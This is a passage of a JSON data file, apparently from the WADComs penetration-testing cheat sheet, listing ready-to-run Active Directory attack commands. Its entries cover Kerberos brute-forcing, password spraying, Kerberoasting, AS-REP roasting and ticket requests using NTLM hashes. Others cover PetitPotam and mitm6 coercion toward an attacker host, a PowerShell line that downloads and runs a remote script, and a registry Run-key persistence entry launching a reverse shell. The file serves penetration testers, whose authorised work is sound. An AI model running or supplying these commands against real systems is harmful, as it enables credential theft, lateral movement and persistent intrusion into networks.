server01.test.local\n\n\tUsername: john\n\n\tHash: :2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tImpersonated User: Administrator\n","mitre":[],"requires":["Hash","Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"]},{"id":"wadcoms:Impacket-getTGT","toolId":"wadcoms:Impacket-getTGT","toolName":"Impacket-getTGT","name":"Impacket-getTGT","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 getTGT.py test.local/john -dc-ip 10.10.10.1 -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7","description":"Impacket's getTGT.py uses a valid user's NTLM hash to request Kerberos tickets, in order to access any service or machine where that user has permissions.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n","mitre":[],"requires":["Hash","Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getTGT.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"]},{"id":"wadcoms:Kerbrute-BruteForce","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-BruteForce","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"cat credentials.txt | kerbrute_linux_amd64 -d test.local bruteforce -","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to brute force valid username and passwords logins given a list of credentials (in the format `username:password`).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tCredential List: credentials.txt\n","mitre":[],"requires":["No_Creds"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"]},{"id":"wadcoms:Kerbrute-BruteUser","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-BruteUser","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"kerbrute bruteuser -d test.local passwords.txt john","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will bruteforce an account against a list of provided passwords given a username.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tPassword List: passwords.txt\n\n\tUsername: john\n","mitre":[],"requires":["Username"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"]},{"id":"wadcoms:Kerbrute-PasswordSpray","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-PasswordSpray","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"kerbrute passwordspray -d test.local domain_users.txt password123","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will perform a password spray account against a list of provided users given a password.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername List: domain_users.txt\n\n\tPassword: password123\n","mitre":[],"requires":["Username"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"]},{"id":"wadcoms:Kerbrute-UserEnum","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-UserEnum","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"kerbrute userenum -d test.local usernames.txt","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to enumerate valid usernames given a list of usernames to try.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n","mitre":[],"requires":["No_Creds"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"]},{"id":"wadcoms:LDAPSearch-Creds","toolId":"wadcoms:LDAPSearch","toolName":"LDAPSearch","name":"LDAPSearch-Creds","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"ldapsearch -h test.local -D 'ldap@test.local' -w password123 -b 'dc=test,dc=local'","description":"ldapsearch is a Linux based tool that opens a connection to an LDAP server, binds, and performs a search using specified parameters. The following command will attempt to find sensitive information (such as leaked creds), by querying all LDAP objects, essentially dumping all the data that an anonymous user can access.\n\nCommand Reference:\n\n\tDomain: test.local\n \n\tUsername: ldap\n \n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://linux.die.net/man/1/ldapsearch"]},{"id":"wadcoms:LDAPSearch-NoCreds","toolId":"wadcoms:LDAPSearch","toolName":"LDAPSearch","name":"LDAPSearch-NoCreds","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"ldapsearch -LLL -x -H ldap://test.local -b'' -s base '(objectclass=\\*)'","description":"ldapsearch is a Linux based tool that opens a connection to an LDAP server, binds, and performs a search using specified parameters. The following command will attempt to find sensitive information (such as leaked creds), by querying all LDAP objects, essentially dumping all the data that an anonymous user can access.\n\nCommand Reference:\n\n\tDomain: test.local\n","mitre":[],"requires":["No_Creds"],"services":["LDAP"],"references":["https://linux.die.net/man/1/ldapsearch"]},{"id":"wadcoms:Mitm6","toolId":"wadcoms:Mitm6","toolName":"Mitm6","name":"Mitm6","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"mitm6 -d test.local --ignore-nofqnd","description":"mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server. It does this by replying to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attackers host as default DNS server. The following command will respond to DHCPv6 messages and set the DNS server to the attack host IP. Leverage this command with ntlmrelayx.py to capture the WPAD configuration requests. \n\nCommand Reference:\n\n\tDomain: test.local\n","mitre":[],"requires":["No_Creds"],"services":["DNS"],"references":["https://github.com/dirkjanm/mitm6","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"]},{"id":"wadcoms:NetExec-Creds-coerce_plus","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Creds-coerce_plus","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration","Execution"],"nativeCategory":["Enumeration","Privilidge Escalation","Exploitation","Laterl movement"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M coerce_plus","description":"\"NetExec (a.k.a nxc) is a network pentesting suite that has many modules that can be listed via nxc <protocol> -L. The coerece_plus module will enumarate a target ip, dnsname, list of targets or ip range for different coherence attacks. It will indicate in the output which a target is vulnrable to. Providing you also a means for exploit by adding where your listener/reciving system is(-LISTENER=10.10.10.1) and which exploit you want it to use. The module was recently updated 7 days ago to work on the latest windows build\"\n\n Command Reference:\n\n Target IP: 10.10.10.1\n\n Username: john\n\n Password: password123 \n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://blog.redteam-pentesting.de/2025/windows-coercion/","https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/scan-for-vulnerabilities"]},{"id":"wadcoms:NetExec-Enum-LDAP","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-LDAP","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"nxc ldap 10.10.10.1 -u 'john' -p 'password123' --trusted-for-delegation --password-not-required --admin-count --users --groups","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate domain groups, local groups, users, user descriptions, users trusted for delegation, users without a password, You can also use CIDR notation to target a range of ip addresses (i.e. 10.10.10.0/24).\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-Enum-SMB-Anonymous","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"nxc smb 10.10.10.1 -u 'a' -p ''","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate the SMB host using anonymous access. \n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-Enum-SMB-Null","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB-Null","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"nxc smb 10.10.10.1 -u '' -p ''","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate the SMB host using a null session. \n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-Enum-SMB-Relay-List","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB-Relay-List","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"nxc smb smb_host.txt --gen-relay-list output.txt","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. The following command will enumerate a list of SMB hosts with signing not enforced, allowing you to relay credentials to them using ntlmrelayx.py.\n\nCommand Reference:\n\n\tSMB Hosts: smb_hosts.txt\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-Enum-SMB","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"nxc smb 10.10.10.1 -u 'john' -p 'password123' --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate domain groups, local groups, logged on users, relative identifiers (RIDs), sessions, domain users, SMB shares/permissions, and get the domain password policy. You can also use CIDR notation to target a range of ip addresses (i.e. 10.10.10.0/24).\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-Exec-SMB","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Exec-SMB","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"nxc smb 10.10.10.1 -u 'john' -p 'password123' -X '$Host'","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will execute a powershell command on the target machine if the user has Administrator privileges. using \"-x\" will execute from cmd.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-LDAP-ASREPRoasting","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-ASREPRoasting","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access","AS-REP Roasting"],"command":"nxc ldap 10.10.10.1 -u users.txt -p '' --asreproast output.txt","description":"NetExec (formerly CrackMapExec) performs an AS-REP Roasting attack via the LDAP service.\nThis command attempts to enumerate domain accounts that do not require pre-authentication \nand requests Kerberos AS-REP responses for them. The extracted encrypted ticket-granting \nticket (TGT) hashes are saved into the specified file and can later be cracked offline \nto recover plaintext credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\tDomain: test.local\n\tUsername List: users.txt\n\tPassword: (empty string)\n\tOutput File: output.txt\n","mitre":["T1558.004"],"requires":["Username","Hash"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://attack.mitre.org/techniques/T1558/004/"]},{"id":"wadcoms:NetExec-LDAP-Kerberoasting","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-Kerberoasting","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access","Kerberoasting"],"command":"nxc ldap 10.10.10.1 -u 'john' -p 'password123' --kerberoasting output.txt","description":"NetExec (formerly CrackMapExec) performs a Kerberoasting attack via the LDAP service.\nThis command authenticates with the given domain account, enumerates Service Principal Name (SPN) accounts, \nand extracts their Kerberos ticket hashes, saving them into the specified file.\nThe obtained hashes can later be cracked offline using brute force or wordlists.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\tDomain: test.local\n\tUsername: john\n\tPassword: password123\n\tOutput File: output.txt\n","mitre":["T1558.003"],"requires":["Username","Password","Hash"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast","https://attack.mitre.org/techniques/T1558/003/"]},{"id":"wadcoms:NetExec-SMB-Password-Spray","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-Password-Spray","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"nxc smb 10.10.10.1 -u users.txt -p password123","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will perform password spraying over SMB against the domain controller.\n\nCommand Reference:\n\n\tDomain Controller IP: 10.10.10.1\n\n\tUsername List: users.txt\n\n\tPassword: password123\n","mitre":[],"requires":["Username"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-SMB-Timeroasting","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-Timeroasting","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access","Timeroasting"],"command":"nxc smb 10.10.10.1 -M timeroast","description":"NetExec (formerly CrackMapExec) performs a Timeroasting attack via the SMB service.\nThis command targets the remote Windows host and abuses the Kerberos protocol by \nmanipulating ticket lifetimes or requesting renewable service tickets. \nIt can help attackers obtain long-lived Kerberos tickets for offline cracking \nor later lateral movement.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\tModule: timeroast\n","mitre":[],"requires":["Hash","Username"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://cybersecurity.bureauveritas.com/blog/timeroasting-attacking-trust-accounts-in-active-directory"]},{"id":"wadcoms:Nmap-Krb5-Enum-Users","toolId":"wadcoms:Nmap","toolName":"Nmap","name":"Nmap-Krb5-Enum-Users","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='test.local',userdb=usernames.txt 10.10.10.1","description":"Nmap's `krb5-enum-users` script attempts to bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to enumerate valid usernames given a list of usernames to try.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n","mitre":[],"requires":["No_Creds"],"services":["Kerberos","Enumeration"],"references":["https://nmap.org/download.html","https://nmap.org/nsedoc/scripts/krb5-enum-users.html"]},{"id":"wadcoms:PKINIT-getnthash","toolId":"wadcoms:PKINIT","toolName":"PKINIT","name":"PKINIT-getnthash","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"KRB5CCNAME=out.ccache python3 getnthash.py test.local/DC01\\$ -key 6e63333c372d7fbe64dab63f36673d0cd03bfb92b2a6c96e70070be7cb07f773","description":"PKINIT getnthash.py request a TGS for yourself using Kerberos U2U. This will include with the PAC which in turn contains the NT hash that you can decrypt with the AS-REP key that you got from your TGT request using gettgtpkinit.py from PKINIT. Use the TGT from gettgtpkinit.py in your KRB5CCNAME env variable.\n\nCommand Reference:\n\n Domain: test.local\n\n Host that you got the TGT from: DC01\n\n TGT from gettgtpkinit.py: out.ccache\n\n AS-REP key: 6e63333c372d7fbe64dab63f36673d0cd03bfb92b2a6c96e70070be7cb07f773\n","mitre":[],"requires":["TGT"],"services":["Kerberos"],"references":["https://github.com/dirkjanm/PKINITtools","https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/"]},{"id":"wadcoms:PKINIT-gettgtpkinit","toolId":"wadcoms:PKINIT","toolName":"PKINIT","name":"PKINIT-gettgtpkinit","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"python3 gettgtpkinit.py test.local/DC01\\$ -cert-pfx crt.pfx -pfx-pass password123 out.ccache","description":"PKINIT gettgtpkinit.py request a TGT using a PFX file, either as file or as base64 encoded blob, or PEM files for cert+key. This uses Kerberos PKINIT and will output a TGT into the specified ccache. It will also print the AS-REP encryption key which you may need for the getnthash.py tool.\n\nCommand Reference:\n\n Domain: test.local\n\n Host that you got the certificate from: DC01\n\n PFX file: crt.pfx\n\n PFX file password: password123\n\n TGT requested: out.ccache\n","mitre":[],"requires":["Username","Password","PFX"],"services":["Kerberos"],"references":["https://github.com/dirkjanm/PKINITtools","https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/"]},{"id":"wadcoms:PSADmodule-Kerbaroasting","toolId":"wadcoms:PSADmodule","toolName":"PSADmodule","name":"PSADmodule-Kerbaroasting","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Get-ADUser -Filter {ServicePrincipalName -ne \"$null\" -and Enabled -eq $true} -Properties ServicePrincipalName | select -ExpandProperty ServicePrincipalName | % { $spn = $_; Add-Type -AssemblyName System.IdentityModel; $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn; $ticketBytes = $ticket.GetRequest(); $ticketBase64 = [System.Convert]::ToBase64String($ticketBytes); $account = (Get-ADUser -Filter {ServicePrincipalName -eq $spn} -Properties SamAccountName).SamAccountName; Write-Output \"===== $account : $spn =====`n$ticketBase64\" } | Out-File -FilePath \"kerberos_tickets.txt\" -Encoding ASCII","description":"Kerberoasting is the act of requesting service tickes for accounts that have an SPN set, and then attempting to crack those hashes offline. \nThis one liner using the powershell AD module serves less as a feasiable attack and more as a PoC that the AD module with some ingenuity\ncan be used to exploit many vectors within AD that you otherwise import tools that are not signed, need obfiscation, require AV/EDR bypass or other\nsteps that may trigger alerts.\n","mitre":[],"requires":["powershell"],"services":["Kerberos"],"references":["https://github.com/samratashok/ADModule"]},{"id":"wadcoms:PetitPotam","toolId":"wadcoms:PetitPotam","toolName":"PetitPotam","name":"PetitPotam","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 PetitPotam.py -d test.local -u john -p password123 10.10.10.2 10.10.10.1","description":"PetitPotam leverages the MS-EFSRPC API to connect to a Windows host, hijack the authentication session, and trigger an authentication from the target host to an attacker controlled host (usually SMB or HTTP server). This captured authentication can then be relayed to authenticate to other hosts and perform more attacks. See more in ntlmrelayx.py.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC","NTLM"],"references":["https://github.com/topotam/PetitPotam","https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory"]},{"id":"wadcoms:Powershell-ADModule-enum","toolId":"wadcoms:Powershell","toolName":"Powershell","name":"Powershell-ADModule-enum","source":"WADComs","platform":["Windows"],"capability":["Discovery","Credential Access"],"nativeCategory":["Discovery","Credential Access"],"command":"iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory","description":"The Active Directory Module from powershell can be used to preform most needed enumaration tasks as well as some exploitation tasks revoling around ACL/DACL/Delegation abuse. The modules does not need to be installed on the target, it is signed by microsoft and thus greatly reduces the risk of detection and lastly works without restriction in constrained language mode(CLM). This entry focused on downloading and importing it in memory for a given session, one liners can be found in other entries of WADCOMs\n","mitre":[],"references":["https://docs.microsoft.com/en-us/powershell/module/activedirectory/","https://github.com/samratashok/ADModule","https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.html"]},{"id":"wadcoms:PwshADmodule-DelegationAttack-Enum","toolId":"wadcoms:PwshADmodule","toolName":"PwshADmodule","name":"PwshADmodule-DelegationAttack-Enum","source":"WADComs","platform":["Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"# 1. Unconstrained (turned on for all Domain controllers by default)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Server $_ | select Name,DNSHostName; Get-ADUser -Filter {TrustedForDelegation -eq $true} -Server $_ | select Name,SamAccountName }\n\n\n# 2. Constrained (with protocol transition check)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter {msDS-AllowedToDelegateTo -like \"*\"} -Properties msDS-AllowedToDelegateTo,TrustedToAuthForDelegation -Server $_ | select Name,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo; Get-ADUser -Filter {msDS-AllowedToDelegateTo -like \"*\"} -Properties msDS-AllowedToDelegateTo,TrustedToAuthForDelegation -Server $_ | select Name,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo }\n\n# 3. RBCD (which object is already configured)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity -Server $_ | ? {$_.\"msDS-AllowedToActOnBehalfOfOtherIdentity\"} | select Name,DNSHostName }\n\n# 4. RBCD (which object can configure it - write access)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter * -Properties nTSecurityDescriptor -Server $_ | ? {$_.nTSecurityDescriptor.Access | ? {$_.ActiveDirectoryRights -match \"GenericWrite|WriteProperty\" -and $_.IdentityReference -notmatch \"SYSTEM|Domain Admins\"}} | select Name }","description":"Having imported the pwsh AD module referenced in the project, we can begin to use it to enumerate for potential points of exploit\none of the prime being kerberos delegation attacks. The following 4 line commands will enumerate the entire AD forest for RBCD, Constrained and Unconstrained delegation attacks.\nNote that we will also factor in protocol trainsiton as those change the attack vector slightly. See references below\n","mitre":[],"requires":["PowerShell"],"references":["https://redfoxsec.com/blog/attacking-kerberos-delegation/","https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://github.com/samratashok/ADModule"]},{"id":"wadcoms:PwshADmodule-Initial-Enum","toolId":"wadcoms:PwshADmodule","toolName":"PwshADmodule","name":"PwshADmodule-Initial-Enum","source":"WADComs","platform":["Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"#Getting all DCs in the forest\n(Get-ADForest).Domains | % { Get-ADDomainController -DomainName $_ -Discover }\n\n#Getting all users in the forest\n(Get-ADForest).Domains | % { Get-ADUser -Filter * -Server $_ }\n\n#Getting all computers in the forest\n(Get-ADForest).Domains | % { Get-ADComputer -Filter * -Server $_ }\n\n#Mapping out entire trust relationships\nGet-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' | Select-Object Source,Target,Name\n\n#Getting all groups in a domain. Note that the select statement will limit the output to only the matching fields the object contains\nGet-ADGroup -Filter * | Select-Object SamAccountName, GroupScope, DistinguishedName","description":"These commands provide a quick refernece for using the AD module to get situational awerness of the AD environment.\nNote that to get more commands that you can run, use the get command cmdlet, e.g. `Get-Command -Module ActiveDirectory` But Thes\nare the standard commands that will get you standard. Feel free to replace the first pipe with the -server \"your domain\" if you dont want\nto enumarate the entire forest. For more info on using the AD module, please check out our discussion on the AD module in WADCOMs.\n","mitre":[],"references":["https://docs.microsoft.com/en-us/powershell/module/activedirectory/","https://github.com/samratashok/ADModule"]},{"id":"wadcoms:PyLDAPmonitor","toolId":"wadcoms:PyLDAPmonitor","toolName":"PyLDAPmonitor","name":"PyLDAPmonitor","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 ldapmonitor.py -u 'john' -d 'TEST.local' -p 'password123' --dc-ip 10.10.10.1","description":"ldapmonitor.py allows you to monitor creation, deletion and changes to LDAP objects live during your pentest.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username","Hash"],"services":["LDAP","Kerberos","NTLM"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/python"]},{"id":"wadcoms:PyWhisker","toolId":"wadcoms:PyWhisker","toolName":"PyWhisker","name":"PyWhisker","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 pywhisker.py -d \"test.local\" -u \"john\" -p \"password123\" --target \"user2\" --action \"list\" --dc-ip \"10.10.10.1\"","description":"pyWhisker is a tool allowing users to manipulate the msDS-KeyCredentialLink attribute of a target user/computer to obtain full control over that object. It's based on Impacket and on our Python equivalent of Michael Grafnetter's DSInternals called PyDSInternals. This tool, along with Dirk-jan's PKINITtools allow for a complete primitive exploitation on UNIX-based systems only.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos"],"references":["https://github.com/shutdownrepo/pywhisker"]},{"id":"wadcoms:RPCClient-Anonymous","toolId":"wadcoms:RPCClient","toolName":"RPCClient","name":"RPCClient-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"rpcclient -U '' -N 10.10.10.1","description":"rpcclient is a tool used for executing client side MS-RPC functions to manage Windows NT clients from Unix workstatios. From an offensive security standpoint, it can be used to enumerate users, groups, and other potentially sensitive information. The following command attempt to connect to the NetBIOS server anonymously, in order to enumerate using MS-RPC available commands/functions.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["RPC"],"references":["https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html","https://www.ired.team/offensive-security/enumeration-and-discovery/enumerating-windows-domains-using-rpcclient-through-socksproxy-bypassing-command-line-logging"]},{"id":"wadcoms:Regexe-Persistence","toolId":"wadcoms:Regexe","toolName":"Regexe","name":"Regexe-Persistence","source":"WADComs","platform":["Windows"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"reg.exe add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v Persistence /t REG_SZ /d \"C:\\Path\\To\\revshell.exe\"\n\nreg.exe add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v Persistence /t REG_SZ /d \"C:\\Path\\To\\revshell.exe\"","description":"It is possible to gain persistence on a windows machine by adding reg keys that will execute an arbitrary payload during logon or startup. Keys added to the HKLM hive will execute on startup. Keys added to the HKCU hive will execute when the corresponding user logs on. Adding keys into the HKLM hive will require an elevated shell. There are four keys that can be used: Run, RunOnce, RunServices, and RunServicesOnce. By default, a RunOnce key is deleted after the specified command is executed. The path for these keys is the same for the HKLM and HKCU hives.\n\nCommand Reference:\n\n\tValue Name: Persistence\n\n\tRegKey data type: REG_SZ\n\n\tData: \"C:\\Path\\To\\revshell.exe\"\n\n\tKeyName: \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\n","mitre":[],"requires":["Shell"],"references":["https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/","https://www.hackingarticles.in/windows-persistence-using-winlogon/","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg","https://docs.microsoft.com/en-us/windows-hardware/drivers/install/runonce-registry-key"]},{"id":"wadcoms:Responder-Analyze","toolId":"wadcoms:Responder","toolName":"Responder","name":"Responder-Analyze","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Responder -I eth0 -A","description":"Responder is an LLMNR, NBT-NS, and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool will only answer to File Server Service request, which is for SMB. The following command will put Responder in analyze mode, listening for NBT-NS, BROWSER, and LLMNR requests without responding.\n\nCommand Reference:\n\n\tInterface: 